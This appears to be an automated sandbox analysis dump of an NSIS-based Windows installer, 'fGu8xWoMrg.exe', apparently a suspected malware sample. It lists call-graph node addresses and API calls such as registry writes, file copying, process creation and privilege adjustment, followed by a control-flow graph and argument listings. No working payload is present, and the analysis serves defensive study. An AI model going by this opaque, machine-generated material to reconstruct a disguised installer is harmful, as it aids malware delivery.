GetVersionExW 3755 403581 3754->3755 3756 403549 GetVersionExW 3754->3756 3757 4035da 3755->3757 3758 4068d4 5 API calls 3755->3758 3756->3755 3759 406864 3 API calls 3757->3759 3758->3757 3760 4035f0 lstrlenA 3759->3760 3760->3757 3761 403600 3760->3761 3762 4068d4 5 API calls 3761->3762 3763 403607 3762->3763 3764 4068d4 5 API calls 3763->3764 3765 40360e 3764->3765 3766 4068d4 5 API calls 3765->3766 3767 40361a #17 OleInitialize SHGetFileInfoW 3766->3767 3845 406507 lstrcpynW 3767->3845 3770 403667 GetCommandLineW 3846 406507 lstrcpynW 3770->3846 3772 403679 3773 405e03 CharNextW 3772->3773 3774 40369f CharNextW 3773->3774 3780 4036b0 3774->3780 3775 4037ae 3776 4037c2 GetTempPathW 3775->3776 3847 4034c6 3776->3847 3778 4037da 3781 403834 DeleteFileW 3778->3781 3782 4037de GetWindowsDirectoryW lstrcatW 3778->3782 3779 405e03 CharNextW 3779->3780 3780->3775 3780->3779 3787 4037b0 3780->3787 3857 40307d GetTickCount GetModuleFileNameW 3781->3857 3784 4034c6 12 API calls 3782->3784 3785 4037fa 3784->3785 3785->3781 3786 4037fe GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3785->3786 3790 4034c6 12 API calls 3786->3790 3941 406507 lstrcpynW 3787->3941 3788 403847 3789 40390b 3788->3789 3791 4038fc 3788->3791 3795 405e03 CharNextW 3788->3795 3946 403adc 3789->3946 3794 40382c 3790->3794 3885 403bb6 3791->3885 3794->3781 3794->3789 3812 403869 3795->3812 3798 403a33 3800 405b67 MessageBoxIndirectW 3798->3800 3799 403a48 3801 403a50 GetCurrentProcess OpenProcessToken 3799->3801 3802 403ac6 ExitProcess 3799->3802 3806 403a40 ExitProcess 3800->3806 3807 403a96 3801->3807 3808 403a67 LookupPrivilegeValueW AdjustTokenPrivileges 3801->3808 3804 4038d2 3809 405ede 18 API calls 3804->3809 3805 403913 3811 405ad2 5 API calls 3805->3811 3810 4068d4 5 API calls 3807->3810 3808->3807 3813 4038de 3809->3813 3814 403a9d 3810->3814 3815 403918 lstrcatW 3811->3815 3812->3804 3812->3805 3813->3789 3942 406507 lstrcpynW 3813->3942 3816 403ab2 ExitWindowsEx 3814->3816 3821 403abf 3814->3821 3817 403934 lstrcatW lstrcmpiW 3815->3817 3818 403929 lstrcatW 3815->3818 3816->3802 3816->3821 3817->3789 3819 403954 3817->3819 3818->3817 3822 403960 3819->3822 3823 403959 3819->3823 3825 40140b 2 API calls 3821->3825 3827 405ab5 2 API calls 3822->3827 3826 405a38 4 API calls 3823->3826 3824 4038f1 3943 406507 lstrcpynW 3824->3943 3825->3802 3829 40395e 3826->3829 3830 403965 SetCurrentDirectoryW 3827->3830 3829->3830 3831 403982 3830->3831 3832 403977 3830->3832 3945 406507 lstrcpynW 3831->3945 3944 406507 lstrcpynW 3832->3944 3835 406544 17 API calls 3836 4039c4 DeleteFileW 3835->3836 3837 4039d0 CopyFileW 3836->3837 3842 40398f 3836->3842 3837->3842 3838 403a1a 3840 4062c7 36 API calls 3838->3840 3839 4062c7 36 API calls 3839->3842 3840->3789 3841 406544 17 API calls 3841->3842 3842->3835 3842->3838 3842->3839 3842->3841 3843 405aea 2 API calls 3842->3843 3844 403a04 CloseHandle 3842->3844 3843->3842 3844->3842 3845->3770 3846->3772 3848 40678e 5 API calls 3847->3848 3849 4034d2 3848->3849 3850 4034dc 3849->3850 3851 405dd6 3 API calls 3849->3851 3850->3778 3852 4034e4 3851->3852 3853 405ab5 2 API calls 3852->3853 3854 4034ea 3853->3854 3953 406026 3854->3953 3957 405ff7 GetFileAttributesW CreateFileW 3857->3957 3859 4030bd 3860 4030cd 3859->3860 3958 406507 lstrcpynW 3859->3958 3860->3788 3862 4030e3 3863 405e22 2 API calls 3862->3863 3864 4030e9 3863->3864 3959 406507 lstrcpynW 3864->3959 3866 4030f4 GetFileSize 3881 4031ee 3866->3881 3884 40310b 3866->3884 3868 4031f7 3868->3860 3870 403227 GlobalAlloc 3868->3870 3972 4034af SetFilePointer 3868->3972 3869 403499 ReadFile 3869->3884 3971 4034af SetFilePointer 3870->3971 3872 40325a 3874 403019 6 API calls 3872->3874 3874->3860 3875 403210 3877 403499 ReadFile 3875->3877 3876 403242 3878 4032b4 35 API calls 3876->3878 3879 40321b 3877->3879 3882 40324e 3878->3882 3879->3860 3879->3870 3880 403019 6 API calls 3880->3884 3960 403019 3881->3960 3882->3860 3882->3882 3883 40328b SetFilePointer 3882->3883 3883->3860 3884->3860 3884->3869 3884->3872 3884->3880 3884->3881 3886 4068d4 5 API calls 3885->3886 3887 403bca 3886->3887 3888 403bd0 3887->3888 3889 403be2 3887->3889 3981 40644e wsprintfW 3888->3981 3890 4063d5 3 API calls 3889->3890 3891 403c12 3890->3891 3893 403c31 lstrcatW 3891->3893 3895 4063d5 3 API calls 3891->3895 3894 403be0 3893->3894 3973 403e8c 3894->3973 3895->3893 3898 405ede 18 API calls 3899 403c63 3898->3899 3900 403cf7 3899->3900 3902 4063d5 3 API calls 3899->3902 3901 405ede 18 API calls 3900->3901 3903 403cfd 3901->3903 3904 403c95 3902->3904 3905 403d0d LoadImageW 3903->3905 3906 406544 17 API calls 3903->3906 3904->3900 3909 403cb6 lstrlenW 3904->3909 3913 405e03 CharNextW 3904->3913 3907 403db3 3905->3907 3908 403d34 RegisterClassW 3905->3908 3906->3905 3912 40140b 2 API calls 3907->3912 3910 403dbd 3908->3910 3911 403d6a SystemParametersInfoW CreateWindowExW 3908->3911 3914 403cc4 lstrcmpiW 3909->3914 3915 403cea 3909->3915 3910->3789 3911->3907 3916 403db9 3912->3916 3917 403cb3 3913->3917 3914->3915 3918 403cd4 GetFileAttributesW 3914->3918 3919 405dd6 3 API calls 3915->3919 3916->3910 3922 403e8c 18 API calls 3916->3922 3917->3909 3921 403ce0 3918->3921 3920 403cf0 3919->3920 3982 406507 lstrcpynW 3920->3982 3921->3915 3925 405e22 2 API calls 3921->3925 3923 403dca 3922->3923 3926 403dd6 ShowWindow 3923->3926 3927 403e59 3923->3927 3925->3915 3928 406864 3 API calls 3926->3928 3929 40563c 5 API calls 3927->3929 3930 403dee 3928->3930 3931 403e5f 3929->3931 3934 403dfc GetClassInfoW 3930->3934 3936 406864 3 API calls 3930->3936 3932 403e63 3931->3932 3933 403e7b 3931->3933 3932->3910 3939 40140b 2 API calls 3932->3939 3935 40140b 2 API calls 3933->3935 3937 403e10 GetClassInfoW RegisterClassW 3934->3937 3938 403e26 DialogBoxParamW 3934->3938 3935->3910 3936->3934 3937->3938 3940 40140b 2 API calls 3938->3940 3939->3910 3940->3910 3941->3776 3942->3824 3943->3791 3944->3831 3945->3842 3947 403af4 3946->3947 3948 403ae6 CloseHandle 3946->3948 3984 403b21 3947->3984 3948->3947 3951 405c13 67 API calls 3952 403a28 OleUninitialize 3951->3952 3952->3798 3952->3799 3954 406033 GetTickCount GetTempFileNameW 3953->3954 3955 4034f5 3954->3955 3956 406069 3954->3956 3955->3778 3956->3954 3956->3955 3957->3859 3958->3862 3959->3866 3961 403022 3960->3961 3962 40303a 3960->3962 3963 403032 3961->3963 3964 40302b DestroyWindow 3961->3964 3965 403042 3962->3965 3966 40304a GetTickCount 3962->3966 3963->3868 3964->3963 3967 406910 2 API calls 3965->3967 3968 403058 CreateDialogParamW ShowWindow 3966->3968 3969 40307b 3966->3969 3970 403048 3967->3970 3968->3969 3969->3868 3970->3868 3971->3876 3972->3875 3974 403ea0 3973->3974 3983 40644e wsprintfW 3974->3983 3976 403f11 3977 403f45 18 API calls 3976->3977 3979 403f16 3977->3979 3978 403c41 3978->3898 3979->3978 3980 406544 17 API calls 3979->3980 3980->3979 3981->3894 3982->3900 3983->3976 3985 403b2f 3984->3985 3986 403af9 3985->3986 3987 403b34 FreeLibrary GlobalFree 3985->3987 3986->3951 3987->3986 3987->3987 4448 401b77 4449 402da6 17 API calls 4448->4449 4450 401b7e 4449->4450 4451 402d84 17 API calls 4450->4451 4452 401b87 wsprintfW 4451->4452 4453 402c2a 4452->4453 4454 40167b 4455 402da6 17 API calls 4454->4455 4456 401682 4455->4456 4457 402da6 17 API calls 4456->4457 4458 40168b 4457->4458 4459 402da6 17 API calls 4458->4459 4460 401694 MoveFileW 4459->4460 4461 4016a7 4460->4461 4467 4016a0 4460->4467 4462 4022f6 4461->4462 4463 40683d 2 API calls 4461->4463 4465 4016b6 4463->4465 4464 401423 24 API calls 4464->4462 4465->4462 4466 4062c7 36 API calls 4465->4466 4466->4467 4467->4464 4468 406bfe 4469 406a82 4468->4469 4470 4073ed 4469->4470 4471 406b03 GlobalFree 4469->4471 4472 406b0c GlobalAlloc 4469->4472 4473 406b83 GlobalAlloc 4469->4473 4474 406b7a GlobalFree 4469->4474 4471->4472 4472->4469 4472->4470 4473->4469 4473->4470 4474->4473 4475 4019ff 4476 402da6 17 API calls 4475->4476 4477 401a06 4476->4477 4478 402da6 17 API calls 4477->4478 4479 401a0f 4478->4479 4480 401a16 lstrcmpiW 4479->4480 4481 401a28 lstrcmpW 4479->4481 4482 401a1c 4480->4482 4481->4482 4483 4022ff 4484 402da6 17 API calls 4483->4484 4485 402305 4484->4485 4486 402da6 17 API calls 4485->4486 4487 40230e 4486->4487 4488 402da6 17 API calls 4487->4488 4489 402317 4488->4489 4490 40683d 2 API calls 4489->4490 4491 402320 4490->4491 4492 402331 lstrlenW lstrlenW 4491->4492 4493 402324 4491->4493 4495 405569 24 API calls 4492->4495 4494 405569 24 API calls 4493->4494 4496 40232c 4493->4496 4494->4496 4497 40236f SHFileOperationW 4495->4497 4497->4493 4497->4496 4498 401000 4499 401037 BeginPaint GetClientRect 4498->4499 4500 40100c DefWindowProcW 4498->4500 4502 4010f3 4499->4502 4503 401179 4500->4503 4504 401073 CreateBrushIndirect FillRect DeleteObject 4502->4504 4505 4010fc 4502->4505 4504->4502 4506 401102 CreateFontIndirectW 4505->4506 4507 401167 EndPaint 4505->4507 4506->4507 4508 401112 6 API calls 4506->4508 4507->4503 4508->4507 4509 401d81 4510 401d94 GetDlgItem 4509->4510 4511 401d87 4509->4511 4513 401d8e 4510->4513 4512 402d84 17 API calls 4511->4512 4512->4513 4514 401dd5 GetClientRect LoadImageW SendMessageW 4513->4514 4515 402da6 17 API calls 4513->4515 4517 401e33 4514->4517 4519 401e3f 4514->4519 4515->4514 4518 401e38 DeleteObject 4517->4518 4517->4519 4518->4519 4520 401503 4521 40150b 4520->4521 4523 40151e 4520->4523 4522 402d84 17 API calls 4521->4522 4522->4523 4524 402383 4525 40238a 4524->4525 4528 40239d 4524->4528 4526 406544 17 API calls 4525->4526 4527 402397 4526->4527 4529 405b67 MessageBoxIndirectW 4527->4529 4529->4528 4530 402c05 SendMessageW 4531 402c2a 4530->4531 4532 402c1f InvalidateRect 4530->4532 4532->4531 3639 40248a 3640 402da6 17 API calls 3639->3640 3641 40249c 3640->3641 3642 402da6 17 API calls 3641->3642 3643 4024a6 3642->3643 3656 402e36 3643->3656 3646 40292e 3647 4024de 3649 4024ea 3647->3649 3681 402d84 3647->3681 3648 402da6 17 API calls 3651 4024d4 lstrlenW 3648->3651 3650 402509 RegSetValueExW 3649->3650 3660 4032b4 3649->3660 3654 40251f RegCloseKey 3650->3654 3651->3647 3654->3646 3657 402e51 3656->3657 3684 4063a2 3657->3684 3661 4032cd 3660->3661 3662 4032f8 3661->3662 3698 4034af SetFilePointer 3661->3698 3688 403499 3662->3688 3666 403423 3666->3650 3667 403315 GetTickCount 3677 403328 3667->3677 3668 403439 3669 40343d 3668->3669 3673 403455 3668->3673 3670 403499 ReadFile 3669->3670 3670->3666 3671 403499 ReadFile 3671->3673 3672 403499 ReadFile 3672->3677 3673->3666 3673->3671 3674 4060a9 WriteFile 3673->3674 3674->3673 3676 40338e GetTickCount 3676->3677 3677->3666 3677->3672 3677->3676 3678 4033b7 MulDiv wsprintfW 3677->3678 3680 4060a9 WriteFile 3677->3680 3691 406a4f 3677->3691 3679 405569 24 API calls 3678->3679 3679->3677 3680->3677 3682 406544 17 API calls 3681->3682 3683 402d99 3682->3683 3683->3649 3685 4063b1 3684->3685 3686 4024b6 3685->3686 3687 4063bc RegCreateKeyExW 3685->3687 3686->3646 3686->3647 3686->3648 3687->3686 3689 40607a ReadFile 3688->3689 3690 403303 3689->3690 3690->3666 3690->3667 3690->3668 3692 406a74 3691->3692 3695 406a7c 3691->3695 3692->3677 3693 406b03 GlobalFree 3694 406b0c GlobalAlloc 3693->3694 3694->3692 3694->3695 3695->3692 3695->3693 3695->3694 3696 406b83 GlobalAlloc 3695->3696 3697 406b7a GlobalFree 3695->3697 3696->3692 3696->3695 3697->3696 3698->3662 4540 40290b 4541 402da6 17 API calls 4540->4541 4542 402912 FindFirstFileW 4541->4542 4543 40293a 4542->4543 4546 402925 4542->4546 4548 40644e wsprintfW 4543->4548 4545 402943 4549 406507 lstrcpynW 4545->4549 4548->4545 4549->4546 4550 40190c 4551 401943 4550->4551 4552 402da6 17 API calls 4551->4552 4553 401948 4552->4553 4554 405c13 67 API calls 4553->4554 4555 401951 4554->4555 4556 40490d 4557 404943 4556->4557 4558 40491d 4556->4558 4560 4044ca 8 API calls 4557->4560 4559 404463 18 API calls 4558->4559 4561 40492a SetDlgItemTextW 4559->4561 4562 40494f 4560->4562 4561->4557 4563 40190f 4564 402da6 17 API calls 4563->4564 4565 401916 4564->4565 4566 405b67 MessageBoxIndirectW 4565->4566 4567 40191f 4566->4567 4568 401491 4569 405569 24 API calls 4568->4569 4570 401498 4569->4570 4571 402891 4572 402898 4571->4572 4574 402ba9 4571->4574 4573 402d84 17 API calls 4572->4573 4575 40289f 4573->4575 4576 4028ae SetFilePointer 4575->4576 4576->4574 4577 4028be 4576->4577 4579 40644e wsprintfW 4577->4579 4579->4574 4580 401f12 4581 402da6 17 API calls 4580->4581 4582 401f18 4581->4582 4583 402da6 17 API calls 4582->4583 4584 401f21 4583->4584 4585 402da6 17 API calls 4584->4585 4586 401f2a 4585->4586 4587 402da6 17 API calls 4586->4587 4588 401f33 4587->4588 4589 401423 24 API calls 4588->4589 4590 401f3a 4589->4590 4597 405b2d ShellExecuteExW 4590->4597 4592 401f82 4593 40292e 4592->4593 4594 40697f 5 API calls 4592->4594 4595 401f9f CloseHandle 4594->4595 4595->4593 4597->4592 4598 402f93 4599 402fa5 SetTimer 4598->4599 4600 402fbe 4598->4600 4599->4600 4601 403013 4600->4601 4602 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4600->4602 4602->4601 4603 401d17 4604 402d84 17 API calls 4603->4604 4605 401d1d IsWindow 4604->4605 4606 401a20 4605->4606 4607 404599 lstrcpynW lstrlenW 4608 401b9b 4609 401bec 4608->4609 4614 401ba8 4608->4614 4610 401c16 GlobalAlloc 4609->4610 4611 401bf1 4609->4611 4612 406544 17 API calls 4610->4612 4621 40239d 4611->4621 4629 406507 lstrcpynW 4611->4629 4616 401c31 4612->4616 4613 406544 17 API calls 4617 402397 4613->4617 4614->4616 4618 401bbf 4614->4618 4616->4613 4616->4621 4622 405b67 MessageBoxIndirectW 4617->4622 4627 406507 lstrcpynW 4618->4627 4619 401c03 GlobalFree 4619->4621 4622->4621 4623 401bce 4628 406507 lstrcpynW 4623->4628 4625 401bdd 4630 406507 lstrcpynW 4625->4630 4627->4623 4628->4625 4629->4619 4630->4621 4631 40261c 4632 402da6 17 API calls 4631->4632 4633 402623 4632->4633 4636 405ff7 GetFileAttributesW CreateFileW 4633->4636 4635 40262f 4636->4635 4028 40259e 4039 402de6 4028->4039 4031 402d84 17 API calls 4032 4025b1 4031->4032 4033 4025d9 RegEnumValueW 4032->4033 4034 4025cd RegEnumKeyW 4032->4034 4037 40292e 4032->4037 4035 4025f5 RegCloseKey 4033->4035 4036 4025ee 4033->4036 4034->4035 4035->4037 4036->4035 4040 402da6 17 API calls 4039->4040 4041 402dfd 4040->4041 4042 406374 RegOpenKeyExW 4041->4042 4043 4025a8 4042->4043 4043->4031 4644 40149e 4645 4014ac PostQuitMessage 4644->4645 4646 40239d 4644->4646 4645->4646 4647 404622 4648 40463a 4647->4648 4655 404754 4647->4655 4652 404463 18 API calls 4648->4652 4649 4047be 4650 404888 4649->4650 4651 4047c8 GetDlgItem 4649->4651 4658 4044ca 8 API calls 4650->4658 4653 4047e2 4651->4653 4654 404849 4651->4654 4657 4046a1 4652->4657 4653->4654 4662 404808 SendMessageW LoadCursorW SetCursor 4653->4662 4654->4650 4663 40485b 4654->4663 4655->4649 4655->4650 4656 40478f GetDlgItem SendMessageW 4655->4656 4680 404485 KiUserCallbackDispatcher 4656->4680 4660 404463 18 API calls 4657->4660 4661 404883 4658->4661 4665 4046ae CheckDlgButton 4660->4665 4681 4048d1 4662->4681 4667 404871 4663->4667 4668 404861 SendMessageW 4663->4668 4664 4047b9 4670 4048ad SendMessageW 4664->4670 4678 404485 KiUserCallbackDispatcher 4665->4678 4667->4661 4669 404877 SendMessageW 4667->4669 4668->4667 4669->4661 4670->4649 4673 4046cc GetDlgItem 4679 404498 SendMessageW 4673->4679 4675 4046e2 SendMessageW 4676 404708 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4675->4676 4677 4046ff GetSysColor 4675->4677 4676->4661 4677->4676 4678->4673 4679->4675 4680->4664 4684 405b2d ShellExecuteExW 4681->4684 4683 404837 LoadCursorW SetCursor 4683->4654 4684->4683 3443 4015a3 3444 402da6 17 API calls 3443->3444 3445 4015aa SetFileAttributesW 3444->3445 3446 4015bc 3445->3446 3556 401fa4 3557 402da6 17 API calls 3556->3557 3558 401faa 3557->3558 3559 405569 24 API calls 3558->3559 3560 401fb4 3559->3560 3571 405aea CreateProcessW 3560->3571 3565 401fcf 3567 401fd4 3565->3567 3568 401fdf 3565->3568 3566 40292e 3579 40644e wsprintfW 3567->3579 3570 401fdd CloseHandle 3568->3570 3570->3566 3572 401fba 3571->3572 3573 405b1d CloseHandle 3571->3573 3572->3566 3572->3570 3574 40697f WaitForSingleObject 3572->3574 3573->3572 3575 406999 3574->3575 3576 4069ab GetExitCodeProcess 3575->3576 3580 406910 3575->3580 3576->3565 3579->3570 3581 40692d PeekMessageW 3580->3581 3582 406923 DispatchMessageW 3581->3582 3583 40693d WaitForSingleObject 3581->3583 3582->3581 3583->3575 3584 4056a8 3585 405852 3584->3585 3586 4056c9 GetDlgItem GetDlgItem GetDlgItem 3584->3586 3588 405883 3585->3588 3589 40585b GetDlgItem CreateThread CloseHandle 3585->3589 3629 404498 SendMessageW 3586->3629 3591 4058ae 3588->3591 3593 4058d3 3588->3593 3594 40589a ShowWindow ShowWindow 3588->3594 3589->3588 3632 40563c OleInitialize 3589->3632 3590 405739 3598 405740 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3590->3598 3592 40590e 3591->3592 3595 4058c2 3591->3595 3596 4058e8 ShowWindow 3591->3596 3592->3593 3606 40591c SendMessageW 3592->3606 3597 4044ca 8 API calls 3593->3597 3631 404498 SendMessageW 3594->3631 3600 40443c SendMessageW 3595->3600 3602 405908 3596->3602 3603 4058fa 3596->3603 3601 4058e1 3597->3601 3604 405792 SendMessageW SendMessageW 3598->3604 3605 4057ae 3598->3605 3600->3593 3608 40443c SendMessageW 3602->3608 3607 405569 24 API calls 3603->3607 3604->3605 3609 4057c1 3605->3609 3610 4057b3 SendMessageW 3605->3610 3606->3601 3611 405935 CreatePopupMenu 3606->3611 3607->3602 3608->3592 3612 404463 18 API calls 3609->3612 3610->3609 3613 406544 17 API calls 3611->3613 3615 4057d1 3612->3615 3614 405945 AppendMenuW 3613->3614 3616 405962 GetWindowRect 3614->3616 3617 405975 TrackPopupMenu 3614->3617 3618 4057da ShowWindow 3615->3618 3619 40580e GetDlgItem SendMessageW 3615->3619 3616->3617 3617->3601 3620 405990 3617->3620 3621 4057f0 ShowWindow 3618->3621 3622 4057fd 3618->3622 3619->3601 3623 405835 SendMessageW SendMessageW 3619->3623 3624 4059ac SendMessageW 3620->3624 3621->3622 3630 404498 SendMessageW 3622->3630 3623->3601 3624->3624 3625 4059c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3624->3625 3627 4059ee SendMessageW 3625->3627 3627->3627 3628 405a17 GlobalUnlock SetClipboardData CloseClipboard 3627->3628 3628->3601 3629->3590 3630->3619 3631->3591 3633 4044af SendMessageW 3632->3633 3634 40565f 3633->3634 3637 401389 2 API calls 3634->3637 3638 405686 3634->3638 3635 4044af SendMessageW 3636 405698 CoUninitialize 3635->3636 3637->3634 3638->3635 4685 40202a 4686 402da6 17 API calls 4685->4686 4687 402031 4686->4687 4688 4068d4 5 API calls 4687->4688 4689 402040 4688->4689 4690 4020cc 4689->4690 4691 40205c GlobalAlloc 4689->4691 4691->4690 4692 402070 4691->4692 4693 4068d4 5 API calls 4692->4693 4694 402077 4693->4694 4695 4068d4 5 API calls 4694->4695 4696 402081 4695->4696 4696->4690 4700 40644e wsprintfW 4696->4700 4698 4020ba 4701 40644e wsprintfW 4698->4701 4700->4698 4701->4690 4702 40252a 4703 402de6 17 API calls 4702->4703 4704 402534 4703->4704 4705 402da6 17 API calls 4704->4705 4706 40253d 4705->4706 4707 402548 RegQueryValueExW 4706->4707 4709 40292e 4706->4709 4708 402568 4707->4708 4710 40256e RegCloseKey 4707->4710 4708->4710 4713 40644e wsprintfW 4708->4713 4710->4709 4713->4710 4714 404caa 4715 404cd6 4714->4715 4716 404cba 4714->4716 4718 404d09 4715->4718 4719 404cdc SHGetPathFromIDListW 4715->4719 4725 405b4b GetDlgItemTextW 4716->4725 4721 404cec 4719->4721 4724 404cf3 SendMessageW 4719->4724 4720 404cc7 SendMessageW 4720->4715 4722 40140b 2 API calls 4721->4722 4722->4724 4724->4718 4725->4720 4726 4021aa 4727 402da6 17 API calls 4726->4727 4728 4021b1 4727->4728 4729 402da6 17 API calls 4728->4729 4730 4021bb 4729->4730 4731 402da6 17 API calls 4730->4731 4732 4021c5 4731->4732 4733 402da6 17 API calls 4732->4733 4734 4021cf 4733->4734 4735 402da6 17 API calls 4734->4735 4736 4021d9 4735->4736 4737 402218 CoCreateInstance 4736->4737 4738 402da6 17 API calls 4736->4738 4741 402237 4737->4741 4738->4737 4739 401423 24 API calls 4740 4022f6 4739->4740 4741->4739 4741->4740 4742 401a30 4743 402da6 17 API calls 4742->4743 4744 401a39 ExpandEnvironmentStringsW 4743->4744 4745 401a4d 4744->4745 4747 401a60 4744->4747 4746 401a52 lstrcmpW 4745->4746 4745->4747 4746->4747 3744 4023b2 3745 4023c0 3744->3745 3746 4023ba 3744->3746 3748 402da6 17 API calls 3745->3748 3750 4023ce 3745->3750 3747 402da6 17 API calls 3746->3747 3747->3745 3748->3750 3749 402da6 17 API calls 3753 4023e5 WritePrivateProfileStringW 3749->3753 3751 402da6 17 API calls 3750->3751 3752 4023dc 3750->3752 3751->3752 3752->3749 4760 402434 4761 402467 4760->4761 4762 40243c 4760->4762 4763 402da6 17 API calls 4761->4763 4764 402de6 17 API calls 4762->4764 4765 40246e 4763->4765 4766 402443 4764->4766 4771 402e64 4765->4771 4768 402da6 17 API calls 4766->4768 4770 40247b 4766->4770 4769 402454 RegDeleteValueW RegCloseKey 4768->4769 4769->4770 4772 402e78 4771->4772 4774 402e71 4771->4774 4772->4774 4775 402ea9 4772->4775 4774->4770 4776 406374 RegOpenKeyExW 4775->4776 4777 402ed7 4776->4777 4778 402ee7 RegEnumValueW 4777->4778 4779 402f0a 4777->4779 4786 402f81 4777->4786 4778->4779 4780 402f71 RegCloseKey 4778->4780 4779->4780 4781 402f46 RegEnumKeyW 4779->4781 4782 402f4f RegCloseKey 4779->4782 4784 402ea9 6 API calls 4779->4784 4780->4786 4781->4779 4781->4782 4783 4068d4 5 API calls 4782->4783 4785 402f5f 4783->4785 4784->4779 4785->4786 4787 402f63 RegDeleteKeyW 4785->4787 4786->4774 4787->4786 4795 401735 4796 402da6 17 API calls 4795->4796 4797 40173c SearchPathW 4796->4797 4798 401757 4797->4798 4799 401d38 4800 402d84 17 API calls 4799->4800 4801 401d3f 4800->4801 4802 402d84 17 API calls 4801->4802 4803 401d4b GetDlgItem 4802->4803 4804 402638 4803->4804 4805 4014b8 4806 4014be 4805->4806 4807 401389 2 API calls 4806->4807 4808 4014c6 4807->4808 4816 40263e 4817 402652 4816->4817 4818 40266d 4816->4818 4821 402d84 17 API calls 4817->4821 4819 402672 4818->4819 4820 40269d 4818->4820 4822 402da6 17 API calls 4819->4822 4823 402da6 17 API calls 4820->4823 4828 402659 4821->4828 4824 402679 4822->4824 4825 4026a4 lstrlenW 4823->4825 4833 406529 WideCharToMultiByte 4824->4833 4825->4828 4827 40268d lstrlenA 4827->4828 4829 4026e7 4828->4829 4830 4026d1 4828->4830 4832 4060d8 5 API calls 4828->4832 4830->4829 4831 4060a9 WriteFile 4830->4831 4831->4829 4832->4830 4833->4827

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Function 004034F7 Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450stringfilecomCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 4034f7-403547 SetErrorMode GetVersionExW 1 403581-403588 0->1 2 403549-40357d GetVersionExW 0->2 3 403592-4035d2 1->3 4 40358a 1->4 2->1 5 4035d4-4035dc call 4068d4 3->5 6 4035e5 3->6 4->3 5->6 11 4035de 5->11 8 4035ea-4035fe call 406864 lstrlenA 6->8 13 403600-40361c call 4068d4 * 3 8->13 11->6 20 40362d-40368f #17 OleInitialize SHGetFileInfoW call 406507 GetCommandLineW call 406507 13->20 21 40361e-403624 13->21 28 403691-403693 20->28 29 403698-4036ab call 405e03 CharNextW 20->29 21->20 25 403626 21->25 25->20 28->29 32 4037a2-4037a8 29->32 33 4036b0-4036b6 32->33 34 4037ae 32->34 35 4036b8-4036bd 33->35 36 4036bf-4036c5 33->36 37 4037c2-4037dc GetTempPathW call 4034c6 34->37 35->35 35->36 38 4036c7-4036cb 36->38 39 4036cc-4036d0 36->39 47 403834-40384c DeleteFileW call 40307d 37->47 48 4037de-4037fc GetWindowsDirectoryW lstrcatW call 4034c6 37->48 38->39 41 403790-40379e call 405e03 39->41 42 4036d6-4036dc 39->42 41->32 59 4037a0-4037a1 41->59 45 4036f6-40372f 42->45 46 4036de-4036e5 42->46 53 403731-403736 45->53 54 40374b-403785 45->54 51 4036e7-4036ea 46->51 52 4036ec 46->52 64 403852-403858 47->64 65 403a23-403a31 call 403adc OleUninitialize 47->65 48->47 62 4037fe-40382e GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034c6 48->62 51->45 51->52 52->45 53->54 61 403738-403740 53->61 57 403787-40378b 54->57 58 40378d-40378f 54->58 57->58 63 4037b0-4037bd call 406507 57->63 58->41 59->32 66 403742-403745 61->66 67 403747 61->67 62->47 62->65 63->37 69 40385e-403871 call 405e03 64->69 70 4038ff-403906 call 403bb6 64->70 77 403a33-403a42 call 405b67 ExitProcess 65->77 78 403a48-403a4e 65->78 66->54 66->67 67->54 84 4038c3-4038d0 69->84 85 403873-4038a8 69->85 80 40390b-40390e 70->80 82 403a50-403a65 GetCurrentProcess OpenProcessToken 78->82 83 403ac6-403ace 78->83 80->65 91 403a96-403aa4 call 4068d4 82->91 92 403a67-403a90 LookupPrivilegeValueW AdjustTokenPrivileges 82->92 86 403ad0 83->86 87 403ad3-403ad6 ExitProcess 83->87 88 4038d2-4038e0 call 405ede 84->88 89 403913-403927 call 405ad2 lstrcatW 84->89 93 4038aa-4038ae 85->93 86->87 88->65 103 4038e6-4038fc call 406507 * 2 88->103 106 403934-40394e lstrcatW lstrcmpiW 89->106 107 403929-40392f lstrcatW 89->107 104 403ab2-403abd ExitWindowsEx 91->104 105 403aa6-403ab0 91->105 92->91 97 4038b0-4038b5 93->97 98 4038b7-4038bf 93->98 97->98 102 4038c1 97->102 98->93 98->102 102->84 103->70 104->83 111 403abf-403ac1 call 40140b 104->111 105->104 105->111 108 403a21 106->108 109 403954-403957 106->109 107->106 108->65 112 403960 call 405ab5 109->112 113 403959-40395e call 405a38 109->113 111->83 121 403965-403975 SetCurrentDirectoryW 112->121 113->121 123 403982-4039ae call 406507 121->123 124 403977-40397d call 406507 121->124 128 4039b3-4039ce call 406544 DeleteFileW 123->128 124->123 131 4039d0-4039e0 CopyFileW 128->131 132 403a0e-403a18 128->132 131->132 133 4039e2-403a02 call 4062c7 call 406544 call 405aea 131->133 132->128 134 403a1a-403a1c call 4062c7 132->134 133->132 142 403a04-403a0b CloseHandle 133->142 134->108 142->132
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 0040351A
                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00403543
                                                                                                                                                                            • GetVersionExW.KERNEL32(0000011C), ref: 0040355A
                                                                                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
                                                                                                                                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403634
                                                                                                                                                                            • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
                                                                                                                                                                            • GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
                                                                                                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\fGu8xWoMrg.exe",00000020,"C:\Users\user\Desktop\fGu8xWoMrg.exe",00000000), ref: 004036A0
                                                                                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
